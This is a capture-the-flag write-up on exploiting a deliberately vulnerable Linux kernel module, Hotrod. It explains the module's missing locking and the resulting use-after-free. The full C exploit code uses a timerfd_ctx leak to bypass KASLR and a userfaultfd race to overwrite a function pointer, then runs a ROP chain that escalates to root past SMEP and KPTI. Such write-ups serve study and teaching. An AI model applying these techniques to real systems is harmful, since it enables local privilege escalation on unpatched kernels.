Hotrod is a kernel exploitation challenge created by my friend
FizzBuzz101 for CUCTF 2020. I tested the
challenge before it was released and since the exploitation process was very
interesting, I decided to write this article. In the next sections we
will see how to get a root shell exploiting a UAF, using a single
allocation, a timerfd_ctx
structure and userfaultfd. Let’s get started!
Information Gathering
Before touching the kernel module, we need to better understand the system itself, gathering as much information as possible. The golden rule is always the same: system analysis first, then code analysis.
We can start inspecting run_challnge.sh
:
#!/bin/sh
qemu-system-x86_64 \
-s \
-m 64M \
-nographic \
-kernel "./bzImage" \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr nosmap min_addr=4096" \
-no-reboot \
-cpu qemu64,+smep \
-monitor /dev/null \
-initrd "./initramfs.cpio" \
-smp 2 \
-smp cores=2 \
-smp threads=1
We can immediately see that various protections are enabled.
– SMEP (Supervisor Mode Execution Prevention):
With SMEP, the CPU will generate a fault if we try to directly execute instructions in user space. This means that even if we are able to control the kernel instruction pointer, we cannot simply map an executable memory region in user space, place our code there and execute it.
Luckily, since SMAP (Supervisor Mode Access Prevention) is disabled, we can still access data in higher CPU rings, so we can build our ROP-chain in user space, perform stack pivoting and start executing gadgets. Another approach is to turn off the 20th flag of the CR4 register to disable SMEP and then directly execute code in user space:
– KASLR (Kernel Address Space Layout Randomization):
With this option, every time the system boots up, the location of kernel code in memory is randomized with an entropy of 9 bits. This means that if we want to build a ROP-chain, we will probably need to leak pointers to compute the current kernel base address.
– KPTI (Kernel Page Table Isolation):
KPTI has been implemented in the Linux kernel after the Meltdown security vulnerability. It helps preventing information leaks separating user space and kernel space page tables. Changing the 12th flag of the CR3 register, the system can switch between two sets of page tables. When the system runs in kernel mode, it uses the first set, so it can access both kernel and user address space (The latter for things like copy_to_user etc.). In addition, the NX flag is set in the top level of the user portion of kernel page tables, this way any missed kernel to user CR3 switch will cause a crash. When the system runs in user mode instead, it uses the second set, now it can only access a copy of user address space, and just a limited portion of kernel address space: the code needed for system calls and IDT.
uname -a
Linux (none) 5.8.3 #12 Sun August 26 12:00:00 UTC 2020 x86_64 GNU/Linux
The kernel version is very recent, I couldn’t find any known vulnerability to perform privilege escalation.
The QEMU monitor is set to /dev/null
: we cannot use the monitor console to interact with QEMU and control the guest OS.
We can proceed extracting symbol addresses and ROP gadgets. Since the
System.map file is not
provided and we cannot access /proc/kallsyms
as
unprivileged user, we need to extract the filesystem and modify the
init
file to get root privileges.
The filesystem is compressed using the cpio format, we can extract it and replace uid/gid using the following commands:
mkdir fs && cd fs && cpio -idv < ../initramfs.cpio # Extract the archive
sed -i 's/setuidgid 1000 sh/setuidgid 0 sh/g' init # Replace the user uid/gid
find . | cpio --create --format='newc' > ../initramfs.cpio # Rebuild the archive
The next step is to disable KASLR, we can do this by modifying the kernel command line options:
sed -i 's/kaslr/nokaslr/g' run_challenge.sh
Finally we can get symbols from /proc/kallsyms
.
I also created /bin/info
, containing:
#!/bin/sh
HOTROD=$(cat /proc/kallsyms | grep hotrod_ioctl | cut -d " " -f1)
echo [*] Module base: 0x$HOTROD
Then I added /bin/sh /bin/info
in the
init
file, so every time the system boots up I can get the hotrod_ioctl
address.
Now we can re-enable KASLR, restore the uid/gid to 1000 and rebuild the cpio archive.
To obtain ROP gadgets, we need to extract the kernel image. We can do this
using binwalk
to locate the vmlinuz file (the
compressed kernel image) inside bzImage:
binwalk bzImage
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
15109 0x3B05 gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00)
Then we can use dd
to extract it and
gunzip
to decompress the archive:
dd if=./bzImage bs=1 skip=15109 of=vmlinux.gz && gunzip vmlinux.gz
Now we can finally extract ROP gadgets using ropper or ROPGadget:
ropper --file ./vmlinux --nocolor > gadgets
PS: We could also have used the extract-vmlinux script to extract the kernel image.
Reverse Engineering
file hotrod.ko
hotrod.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=6bcf4da490ac3e3ab5db8148eb08238250716d32, with debug_info, not stripped
I won’t cover the reverse engineering process (from asm to pseudo C) in detail to avoid unnecessarily lengthening the article. Here is my high-level representation of the module after static analysis:
#define ALLOC 0xBAADC0DE
#define FREE 0xC001C0DE
#define SHOW 0x1337C0DE
#define EDIT 0xDEADC0DE
static DEFINE_MUTEX(hotrod_lock);
static unsigned int allocated, freed, showed, edited;
struct miscdevice hotrod_dev;
struct file_operations hotrod_fops;
hotrod_fops.unlocked_ioctl = hotrod_ioctl;
struct {
unsigned long size;
char *content;
} req;
struct {
unsigned long size;
char *content;
} hotrod;
int init_hotrod()
{
mutex_init(&hotrod_lock);
hotrod_dev.minor = 255; // MISC_DYNAMIC_MINOR
hotrod_dev.name = "hotrod";
hotrod_dev.fops = &hotrod_fops;
if (!misc_register(&hotrod_dev)) {
printk(KERN_INFO, "Hotrod Driver Initialized\n");
printk(KERN_INFO, "Remember, all of the features only work once!\n");
return 0;
}
return -1;
}
int hotrod_ioctl(struct file *file, unsigned int action, unsigned long user_req)
{
unsigned long allocation_size;
switch (action) {
case ALLOC:
if (!allocated) {
allocation_size = user_req;
allocated = 1;
if (!hotrod.size && !hotrod.content && 0xe0 <= allocation_size <= 0xf0) {
hotrod.content = kmalloc(allocation_size, GFP_KERNEL);
if (hotrod.content) {
hotrod.size = allocation_size;
return 0;
}
}
}
return -1;
case FREE:
if (!freed) {
freed = 1;
if (hotrod.size && hotrod.content) {
kfree(hotrod.content);
hotrod.contet = 0;
hotrod.size = 0;
return 0;
}
}
return -1;
case SHOW:
if (!showed && hotrod.size) {
showed = 1;
if (hotrod.content) {
copy_from_user(&req, user_req, 0x10);
if (req.size <= hotrod.size) {
copy_to_user(req.content, hotrod.content, req.size);
return 0;
}
}
}
return -1;
case EDIT:
if (!edited && hotrod.size) {
edited = 1;
if (!hotrod.content) {
copy_from_user(&req, user_req, 0x10);
if (req.size <= hotrod.size) {
copy_from_user(hotrod.content, req.content, req.size);
return 0;
}
}
}
return -1;
}
}
void exit_hotrod()
{
misc_deregister(&hotrod_dev);
printk(KERN_INFO, "Hotrod Driver Removed\n");
}
As we can see, the init_hotrod() function is using misc_register(), an interface that allows kernel modules to register a misc device.
In Linux, each device is identified by a major and a minor number. The major number is used by the kernel to identify the driver associated with the device. The misc driver is identified by the major number 10. The minor number depends on the device and it’s used by the driver to differentiate among various devices.
misc_register()
takes as argument a miscdevice
structure,
in this case hotrod_dev.
We can see that in hotrod_dev, three fields are set:
-
minor: In this case set to 255, corresponds to MISC_DYNAMIC_MINOR and as we can see from kernel.org:
If the minor number is set to MISC_DYNAMIC_MINOR a minor number is assigned and placed in the minor field of the structure
. -
name: It leaves no room for imagination…
-
fops: A pointer to the file_operations structure. This structure exposes interfaces needed by users to interact with the device. In this case
unlocked_ioctl()
is the only exposed function, which we will cover shortly.
After initialization, the device node is created in
/dev
. Now we can perform I/O operation on it:
ls -la /dev | grep hotrod
crw-rw-rw- 1 root root 10, 63 Oct 19 09:11 hotrod
The hotrod_ioctl() function, allows us to perform four different operations: Alloc, Free, Show and Edit, but remember, we can perform each action only once!
The allocation size is limited between 0xe0 and 0xf0 bytes, to understand what it means, let’s briefly introduce the Slab Allocator.
The Slab allocator is used by the Linux kernel to group objects of the same size into caches. Each cache consist of one or more slabs and each slab is composed by one or more contiguous page frames. In each slab are stored a certain number of objects.
There are two classes of caches:
-
General purpose caches: They are called
kmalloc-N
where N is a power of two:kmalloc-64
,kmalloc-128
,kmalloc-256
and so on. -
Specialized caches: Used for common objects:
task_struct
,mm_struct
,vm_area_struct
and so on.
/proc/slabinfo
can be used by privileged users to get information about slabs.
The Slab allocator uses a LIFO scheme to perform allocations and deallocations. The kernel will keep track of freed objects in per-cpu freelists and will serve them when a new allocation of the same size takes place.
Please note that this is just a very basic overwiew of the Slab allocator, for a detailed explanation check the articles in References.
At this point we know that allocations in limited range 0xe0-0xf0 bytes, will end up in kmalloc-256. Let’s proceed analyzing the module source code to spot the bug.
The Bug
The old ioctl()
implementation ran under Big
Kernel Lock. From The new way
of ioctl():
ioctl() is one of the remaining parts of the kernel which runs under the Big Kernel Lock (BKL).
In the past, the usage of the BKL has made it possible for long-running ioctl()
methods to create long latencies for unrelated processes.
It was very inefficient in SMP environment, since during
ioctl operations nothing else could be executed, therefore, two new
functions have been introduced: unlocked_ioctl()
and compat_ioctl()
. In kernel version 2.6.36, the
old ioctl implementation has been completely removed, as we can see from
kill .ioctl file_operation.
From The new way of ioctl() we can also understand the difference between the old and the new ioctl()
implementation:
If a driver or filesystem provides an unlocked_ioctl() method, it will be called in preference to the older ioctl().
The differences are that the inode argument is not provided (it's available as filp->f_dentry->d_inode)
and the BKL is not taken prior to the call.
All new code should be written with its own locking, and should use unlocked_ioctl().
This is what we were looking for. Hotrod is using unlocked_ioctl()
but it does not implement its own locking!
This means that we can use multiple threads to cause a race condition that will result in a Use-After-Free. This, later on, will allow us to ger RIP control.
We can formulate the exploitation plan as follows:
-
We can use Alloc to get an allocation in kmalloc-256 and find a way to get a leak using Show.
-
Then we can use Edit to modify the allocated object in kernel space. At the same time, with another thread, we can use Free to release the structure and allocate a victim object in the same location (because of freelists LIFO behavior).
-
At this point the Edit operation will end up overwriting function pointers in the victim object and we will be able to hijack control flow.
To succeed in our plan, we need two elements:
- An object allocable in kmalloc-256 that can be used both to get an information leak and to hijack control flow.
- A way to make the race condition reliable: we can perform each operation only once, so we need to find a way to maximize the success rate of the race condition.
The Victim Object - timerfd_ctx
As we can see from this useful article, an interesting structure allocated in kmalloc-256 cache, is timerfd_ctx.
struct timerfd_ctx
{
union
{
struct hrtimer tmr;
struct alarm alarm;
} t;
ktime_t tintv;
ktime_t moffs;
wait_queue_head_t wqh;
u64 ticks;
int clockid;
short unsigned expired;
short unsigned settime_flags; /* to show in fdinfo */
struct rcu_head rcu;
struct list_head clist;
spinlock_t cancel_lock;
bool might_cancel;
};
The structure in the union are respectively a hrtimer structure:
struct hrtimer
{
struct timerqueue_node node; // timerqueue node, which also manages node.expires
ktime_t _softexpires; // the absolute earliest expiry time of the hrtimer.
enum hrtimer_restart (*function)(struct hrtimer *); // timer expiry callback function
struct hrtimer_clock_base *base; // pointer to the timer base (per cpu and per clock)
u8 state; // state information (See bit values above)
u8 is_rel; // Set if the timer was armed relative
u8 is_soft; // Set if hrtimer will be expired in soft interrupt context.
};
And an alarm structure:
struct alarm
{
struct timerqueue_node node; // timerqueue node adding to the event list this value also includes the expiration time.
struct hrtimer timer; // hrtimer used to schedule events while running
enum alarmtimer_restart (*function)(struct alarm *, ktime_t now); // Function pointer to be executed when the timer fires.
enum alarmtimer_type type; // Alarm type (BOOTTIME/REALTIME).
int state; // Flag that represents if the alarm is set to fire or not.
void *data; // Internal data value.
};
This object is allocated when a timer instance is created by timerfd_create().
timerfd_ctx
is a good candidate since it can be used to leak kernel function pointers (to bypass KASLR), kernel heap addresses and to hijack control flow.
It is important to note that the structure is freed using
kfree_rcu().
kfree_rcu()
will deallocate the object after a grace period to ensure it
is no longer used by any thread. We can use sleep(1)
after closing the timerfd_ctx
file descriptor to make sure it
has actually been freed, then we can use Alloc and Show to get an information leak.
To hijack control flow, we can overwrite the function pointer in the hrtime
structure,
timerfd_tmrproc(): this
function is automatically called by the kernel when the corresponding timer expires.
Here’s timerfd_ctx
in memory. We are interested in the highlighted
fields:
0xffff888000297900: 0xffff888000297900 [1] 0x0000000000000000
0xffff888000297910: 0x0000000000000000 0x00000002ef81037a [2]
0xffff888000297920: 0x00000002ef81037a [3] 0xffffffff81102a00 [4]
0xffff888000297930: 0xffffffff8183e080 0x0000000000000000
0xffff888000297940: 0x0000000000000000 0x0000000000000000
0xffff888000297950: 0x0000000000000000 0x0000000000000000
0xffff888000297960: 0x0000000000000000 0x0000000000000000
0xffff888000297970: 0x0000000000000000 0x0000000000000000
0xffff888000297980: 0xbdbbd3bf6c2a6d81 0xffff888000297988
0xffff888000297990: 0xffff888000297988 0x0000000000000000
0xffff8880002979a0: 0x0000000000000000 0xffff88800013eb00
0xffff8880002979b0: 0x00000000000000a8 0x0000000000000000
0xffff8880002979c0: 0x0000000000000000 0x0000000000000000
0xffff8880002979d0: 0x0000000000000000 0x0000000000000000
0xffff8880002979e0: 0x0000000000000000 0x0000000000000000
[1] Address of current timer node (basically the chunk address)
[2-3] ktime_t, expiry time of the hrtimer
[4] timerfd_tmrproc() function pointer
Optimizing The Race Condition With Userfaultfd
At this point we have the victim object and an exploitation strategy. Now we need to find a way to make the race condition reliable. We will do it taking advantage of a feature of the Linux kernel: usefaultfd.
userfaultfd
, allows unprivileged* user space processes to handle page faults and
perform other memory management tasks, for example it can be used to measure
page fault
latency.
But this feature also has a dark side: it can be used to suspend kernel threads.
An attacker can start monitoring a specific memory range, let’s say a page of
memory, waiting for page faults. When the kernel tries to access that
page, for example with copy_from_user()
, it will cause a page fault and the control will be transferred to
the page faults handler in user space.
This will give the attacker the ability to suspend the kernel thread for an arbitrary amount of time and reliably exploit possible race conditions.
*From kernel 5.11 usefaultfd is not longer usable by unprivileged users. FUSE is a good alternative.
Exploitation Plan
Now that we have all the pieces of the puzzle, we can reformulate our plan as follows:
To get a memory leak, we can allocate a
timerfd_ctx
structure using
timerfd_create()
, then we can free the object by closing the associated file
descriptor.
At this point, we can get an allocation at the same location using Alloc and leak the timerfd_tmrproc()
address using Show.
To control the kernel instruction pointer, let’s see what happens when we use Edit:
[...]
if (!edited && hotrod.size) {
edited = 1;
if (!hotrod.content) {
copy_from_user(&req, user_req, 0x10); // [1]
if (req.size <= hotrod.size) {
copy_from_user(hotrod.content, req.content, req.size); // [2]
return 0;
}
}
}
[...]
The user request is copied to kernel space using
copy_from_user()
[1]. Then, after a size
check, req.size
bytes are copied from req.content
to the previously allocated memory region using a second copy_from_user()
call. [2].
This means that if we map a memory region, let’s say a page of memory, and we use it as
req.content
, userfaultfd can be used to handle the page fault and suspend the kernel thread in the middle of the copy operation.
We first map a page of memory:
void *page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
Then, with another thread, we start monitoring the mapped region using userfaultfd, waiting for a page fault. Now we trigger the copy operation using Edit from the main thread: this will cause a page fault in [2].
At this point the control will be transferred to the page fault handler thread and we will be able to suspend the faulting thread. Now, always with the page fault handler thread, we can:
- Use Free to deallocate the object.
- Allocate a
timerfd_ctx
structure at the same location (because of freelists LIFO behavior). - Release the faulting thread: the copy operation will overwrite the victim object.
The whole process can be visualized with the following diagram:
+
|
|
+----------v----------+
| create_timer() | +------+
+----------+----------+ |
| |
| |
+----------v----------+ |
| do_alloc() | +----> Leak
+----------+----------+ |
| |
| |
+----------v----------+ |
| do_show() | +------+
+----------+----------+
|
|
+----------v----------+
| pthread_create() +--------------------------+
+----------+----------+ |
| |
| +----------v----------+
| | userfaultfd() |
| +----------+----------+
| |
| |
| +--------->+
| | |
| | |
| | ... polling ...
| | |
+----------v----------+ | |
| do_edit() | +----------+
+----------+----------+ |
| |
X PAGE FAULT +------+
| |
| |
+----------v----------+ |
| do_free() | |
+----------+----------+ |
| |
| |
+----------v----------+ |
| create_timer() | +---> Handle PF
+----------+----------+ |
| |
| |
+----------v----------+ |
| ioctl_ufd() | |
+----------+----------+ |
| |
| |
X RELEASE +------+
|
+----------v----------+
| Edit complete (UAF) |
+---------------------+
The Exploit - Controlling RIP
We can start writing the helper functions to interact with the device.
#define DEVICE_PATH "/dev/hotrod"
#define ALLOC 0xBAADC0DE
#define FREE 0xC001C0DE
#define SHOW 0x1337C0DE
#define EDIT 0xDEADC0DE
#define PAGE_SIZE 0x1000
static int fd, ufd;
static unsigned long size = 0xf0;
static unsigned char buff[0xf0];
static unsigned long kernel_base, leak, timerfd_ctx, pivot;
static void *page;
struct request
{
unsigned long size;
unsigned char *buff;
};
void hexdump(unsigned char *buff, unsigned long size)
{
int i,j;
for (i = 0; i < size/8; i++)
{
if ((i % 2) == 0)
{
if (i != 0)
printf(" \n");
printf(" %04x ", i*8);
}
unsigned long ptr = ((unsigned long *)(buff))[i];
printf("0x%016lx", ptr);
printf(" ");
}
printf("\n");
}
void do_alloc(unsigned long size)
{
ioctl(fd, ALLOC, size);
}
void do_free(int fd)
{
ioctl(fd, FREE);
}
void do_show(unsigned char *dest, unsigned long size)
{
struct request req;
req.size = size;
req.buff = dest;
ioctl(fd, SHOW, &req);
}
void do_edit(unsigned char *src, unsigned long size)
{
struct request req;
req.size = size;
req.buff = src;
ioctl(fd, EDIT, &req);
}
A timer can be created using:
int create_timer(int leak)
{
struct itimerspec its;
its.it_interval.tv_sec = 0;
its.it_interval.tv_nsec = 0;
its.it_value.tv_sec = 10;
its.it_value.tv_nsec = 0;
int tfd = timerfd_create(CLOCK_REALTIME, 0);
timerfd_settime(tfd, 0, &its, 0);
if (leak)
{
close(tfd);
sleep(1);
return 0;
}
}
Now we need userfaultfd:
int userfaultfd(int flags)
{
return syscall(SYS_userfaultfd, flags);
}
int initialize_ufd()
{
int fd;
puts("[*] Mmapping page...");
page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
struct uffdio_register reg;
if ((fd = userfaultfd(O_NONBLOCK)) == -1)
{
perror("[ERROR] Userfaultfd failed");
exit(-1);
}
struct uffdio_api api = { .api = UFFD_API };
if (ioctl(fd, UFFDIO_API, &api))
{
perror("[ERROR] ioctl - UFFDIO_API failed");
exit(-1);
}
if (api.api != UFFD_API)
{
puts("[ERROR] Unexepcted UFFD api version!");
exit(-1);
}
printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);
reg.mode = UFFDIO_REGISTER_MODE_MISSING;
reg.range.start = (long)(page);
reg.range.len = PAGE_SIZE;
if (ioctl(fd, UFFDIO_REGISTER, ®))
{
perror("[ERROR] ioctl - UFFDIO_REGISTER failed");
exit(-1);
}
return fd;
}
And the page fault handler:
void *page_fault_handler(void *_ufd)
{
struct pollfd pollfd;
struct uffd_msg fault_msg;
struct uffdio_copy ufd_copy;
int ufd = *((int *) _ufd);
pollfd.fd = ufd;
pollfd.events = POLLIN;
while (poll(&pollfd, 1, -1) > 0)
{
if ((pollfd.revents & POLLERR) || (pollfd.revents & POLLHUP))
{
perror("[ERROR] Polling failed");
exit(-1);
}
if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg))
{
perror("[ERROR] Read - fault_msg failed");
exit(-1);
}
char *page_fault_location = (char *)fault_msg.arg.pagefault.address;
if (fault_msg.event != UFFD_EVENT_PAGEFAULT || (page_fault_location != page && page_fault_location != page + PAGE_SIZE))
{
perror("[ERROR] Unexpected pagefault?");
exit(-1);
}
if (page_fault_location == (void *)0xdead000)
{
printf("[+] Page fault at address %p!\n", page_fault_location);
puts("[*] Freeing...");
do_free(fd);
puts("[*] Creating second timer...");
create_timer(0);
((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x5] = 0x4141414141414141; // [1]
puts("[*] Structure will be overwritten with: ");
hexdump(buff, size);
sleep(1);
ufd_copy.dst = (unsigned long)0xdead000;
ufd_copy.src = (unsigned long)(&buff);
ufd_copy.len = PAGE_SIZE;
ufd_copy.mode = 0;
ufd_copy.copy = 0;
if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
{
perror("ioctl(UFFDIO_COPY)");
exit(-1);
}
exit(0);
}
}
}
As we can see from [1], with this first POC we should be able to overwrite the kernel RIP with a bounch of “A"s.
int main(void)
{
pthread_t tid;
fd = open(DEVICE_PATH, O_RDONLY);
puts("[*] Allocating/Freeing timerfd_ctx structure...");
create_timer(1);
puts("[*] Leaking timerfd_tmrproc address...");
do_alloc(size);
do_show(buff, size);
puts("[+] Object dump: ");
hexdump(buff, size);
leak = ((unsigned long *)(buff))[0x5];
timerfd_ctx = ((unsigned long *)(buff))[0];
kernel_base = leak - 0x81102a00UL + 0x100000000UL;
printf("[+] Leaked timerfd_ctx structure address: 0x%lx\n", timerfd_ctx);
printf("[+] Leaked timerfd_tmrproc address: 0x%lx\n", leak);
printf("[+] Kernel base address: 0x%lx\n", (0xffffffff00000000UL + kernel_base));
int ufd = initialize_ufd();
pthread_create(&tid, NULL, page_fault_handler, &ufd);
puts("[*] Triggering page fault...");
do_edit(page, size);
pthread_join(tid, NULL);
}
Here’s the complete POC code: poc.c
We can compile and run the exploit:
gcc -o poc poc.c -static -s -lpthread
/ $ /home/user/poc
[*] Allocating/Freeing timerfd_ctx structure...
[*] Leaking timerfd_tmrproc address...
[+] Object dump:
0000 0xffff88800029bf00 0x0000000000000000
0010 0x0000000000000000 0x00000002e3f48042
0020 0x00000002e3f48042 0xffffffff81102a00
0030 0xffffffff8183e080 0x0000000000000000
0040 0x0000000000000000 0x0000000000000000
0050 0x0000000000000000 0x0000000000000000
0060 0x0000000000000000 0x0000000000000000
0070 0x0000000000000000 0x0000000000000000
0080 0xbd7dd3bf6c2aa381 0xffff88800029bf88
0090 0xffff88800029bf88 0x0000000000000000
00a0 0x0000000000000000 0xffff88800015ad00
00b0 0x00000000000000a8 0x0000000000000000
00c0 0x0000000000000000 0x0000000000000000
00d0 0x0000000000000000 0x0000000000000000
00e0 0x0000000000000000 0x0000000000000000
[+] Leaked timerfd_ctx structure address: 0xffff88800029bf00
[+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
[+] Kernel base address: 0xfffffffd00000000
[*] Mmapping page...
[*] Start monitoring range: 0xdead000 - 0xdeae000
[*] Triggering page fault...
[+] Page fault at address 0xdead000!
[*] Freeing...
[*] Creating second timer...
[*] Structure will be overwritten with:
0000 0xffff88800029b900 0x0000000000000000
0010 0x0000000000000000 0x000000000eae0e65
0020 0x000000000eae0e65 0x4141414141414141 <- timerfd_tmrproc [1]
0030 0xffffffff8183e080 0x0000000000000000
0040 0x0000000000000000 0x0000000000000000
0050 0x0000000000000000 0x0000000000000000
0060 0x0000000000000000 0x0000000000000000
0070 0x0000000000000000 0x0000000000000000
0080 0xbd7bd3bf6c2aa481 0xffff88800029b988
0090 0xffff88800029b988 0x0000000000000000
00a0 0x0000000000000000 0xffff88800013f800
00b0 0x00000000000000a8 0x0000000000000000
00c0 0x0000000000000000 0x0000000000000000
00d0 0x0000000000000000 0x0000000000000000
00e0 0x0000000000000000 0x0000000000000000
general protection fault: 0000 [#1] PTI
CPU: 0 PID: 66 Comm: exploit Tainted: G O 5.8.3 #12
RIP: 0010:0x4141414141414141 // [2]
Code: Bad RIP value.
RSP: 0018:ffffc90000003f18 EFLAGS: 00000006
[...]
As expected, overwriting the timerfd_tmrproc()
pointer
[1] we can get RIP control when the timer fires. [2] Now
we need to create a ROP chain and perform stack pivoting.
It’s time to use GDB: we are interested in the CPU context when timerfd_tmrproc()
is called. We need one of the registers to contain a pointer to a controllable location: here we will place our fake stack address.
Let’s comment the following line in our poc:
((unsigned long *)(buff))[0x5] = 0x4141414141414141;
Now we can attach GDB to the kernel and set a brakpoint to
timerfd_tmrproc()
.
When the timer expires, timerfd_tmrproc()
is executed and the breakpoint is hit.
From the CPU context, we can see the
RDI contains 0xffff88800029bc00
, the address of
the timerfd_ctx
object:
In red, we can see the address of the structure itself, in green
timerfd_tmrproc
:
Since the RDI is pointing to the timerfd_ctx
structure, and we have full control over its first field, we can place our fake stack here (Remember that it can be mapped in user space because SMAP is not enabled):
void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);
Then, the following gadget can use utilized to perform stack pivoting:
0xffffffff81027b86: mov esp, dword ptr [rdi]; lea rax, [rax + rsi*8]; ret;
We can make the following changes in the page_fault_handler()
function:
[...]
void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);
((unsigned long *)(buff))[0x0] = (unsigned long)(fake_stack + 0x800);
((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x5] = (unsigned long)(pivot);
unsigned long *rop = (unsigned long *)(fake_stack + 0x800);
*rop ++= 0x4242424242424242;
[...]
And execute the exploit again:
/ $ /home/user/poc
[*] Allocating/Freeing timerfd_ctx structure...
[*] Leaking timerfd_tmrproc address...
[+] Object dump:
0000 0xffff88800029b600 0x0000000000000000
0010 0x0000000000000000 0x00000002f21b349d
0020 0x00000002f21b349d 0xffffffff81102a00
0030 0xffffffff8183e080 0x0000000000000000
0040 0x0000000000000000 0x0000000000000000
0050 0x0000000000000000 0x0000000000000000
0060 0x0000000000000000 0x0000000000000000
0070 0x0000000000000000 0x0000000000000000
0080 0xbd74d3bf6c2aab81 0xffff88800029b688
0090 0xffff88800029b688 0x0000000000000000
00a0 0x0000000000000000 0xffff88800013f000
00b0 0x00000000000000a8 0x0000000000000000
00c0 0x0000000000000000 0x0000000000000000
00d0 0x0000000000000000 0x0000000000000000
00e0 0x0000000000000000 0x0000000000000000
[+] Leaked timerfd_ctx structure address: 0xffff88800029b600
[+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
[+] Kernel base address: 0xffffffff00000000
[*] Mmapping page...
[*] Start monitoring range: 0xdead000 - 0xdeae000
[*] Triggering page fault...
[+] Page fault at address 0xdead000!
[*] Freeing...
[*] Creating second timer...
[*] Structure will be overwritten with:
0000 0x000000000cafe800 0x0000000000000000
0010 0x0000000000000000 0x000000000eae0e65
0020 0x000000000eae0e65 0xffffffff81027b86
0030 0xffffffff8183e080 0x0000000000000000
0040 0x0000000000000000 0x0000000000000000
0050 0x0000000000000000 0x0000000000000000
0060 0x0000000000000000 0x0000000000000000
0070 0x0000000000000000 0x0000000000000000
0080 0xbd70d3bf6c2aaa81 0xffff88800029b288
0090 0xffff88800029b288 0x0000000000000000
00a0 0x0000000000000000 0xffff88800013fb00
00b0 0x00000000000000a8 0x0000000000000000
00c0 0x0000000000000000 0x0000000000000000
00d0 0x0000000000000000 0x0000000000000000
00e0 0x0000000000000000 0x0000000000000000
general protection fault: 0000 [#1] PTI
CPU: 0 PID: 66 Comm: exploit Tainted: G O 5.8.3 #12
RIP: 0010:0x4242424242424242 // [1]
Code: Bad RIP value.
RSP: 0018:000000000cafe808 EFLAGS: 00000006 // [2]
[...]
Success! After stack pivoting, we overwritten RIP with a bounch of
“B"s [1], and the RSP now contains 0xcafe808
[2]. It’s time to finalize our ROP-chain!
The Exploit - From “B"s To Root Shell
As a first attempt, let’s try to read the flag. We can extend the ROP chain replicating the effect of
commit_creds(prepare_kernel_cred(0)
.
In Linux every task has its own set of credentials defined by cred structure. cred
, specifies the security context of the task.
prepare_kernel_cred() will allocate a new set of credentials uid,gid etc. set to 0 and commit_creds() will apply it to the current task. This way we will be able to get root privileges.
Then we need to change the 12th flag of the CR3 register (remember that
KPTI
is enabled), use swapgs
to swap GS back
to the user GS, saved in MSR and then use iretq
to
return to user space.
We can do it in different ways. For example we can
use the symbol
swapgs_restore_regs_and_return_to_usermode
. Using
GDB we can see that
swapgs_restore_regs_and_return_to_usermode + 0x16
is a perfect gadget for us:
We can find similar instructions when the system returns to user space after a syscall:
The only difference is that the first gadget utilizes
iretq
, the second one
sysretq
instead:
iretq
expects the following stack layout when returning to user space:
+-------------------+
| RIP |
+-------------------+
| CS |
+-------------------+
| RFLAGS |
+-------------------+
| RSP |
+-------------------+
| SS |
+-------------------+
sysretq
accepts user space RIP from RCX and RFLAGS from R11 instead.
We can save the current processor state using:
static void save_state()
{
__asm__ __volatile__(
"movq %0, cs;"
"movq %1, ss;"
"pushfq;"
"popq %2;"
: "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags) : : "memory" );
}
And read the flag with:
void read_flag()
{
char flag[100];
read(open("/flag", O_RDONLY), flag, 100);
puts(flag);
}
I chose the the second gadget to return to user space, here is how the ROP chain looks like:
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // pkc
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff810537d0UL; // cc
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(read_flag);
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp
Let’s test the modified exploit:
/ $ /home/user/poc3
[*] Allocating/Freeing timerfd_ctx structure...
[*] Leaking timerfd_tmrproc address...
[+] Object dump:
0000 0xffff88800029b800 0x0000000000000000
0010 0x0000000000000000 0x00000002de088cb1
0020 0x00000002de088cb1 0xffffffff81102a00
0030 0xffffffff8183e080 0x0000000000000000
0040 0x0000000000000000 0x0000000000000000
0050 0x0000000000000000 0x0000000000000000
0060 0x0000000000000000 0x0000000000000000
0070 0x0000000000000000 0x0000000000000000
0080 0xbd7ad3bf6c2aae81 0xffff88800029b888
0090 0xffff88800029b888 0x0000000000000000
00a0 0x0000000000000000 0xffff888000157600
00b0 0x00000000000000a8 0x0000000000000000
00c0 0x0000000000000000 0x0000000000000000
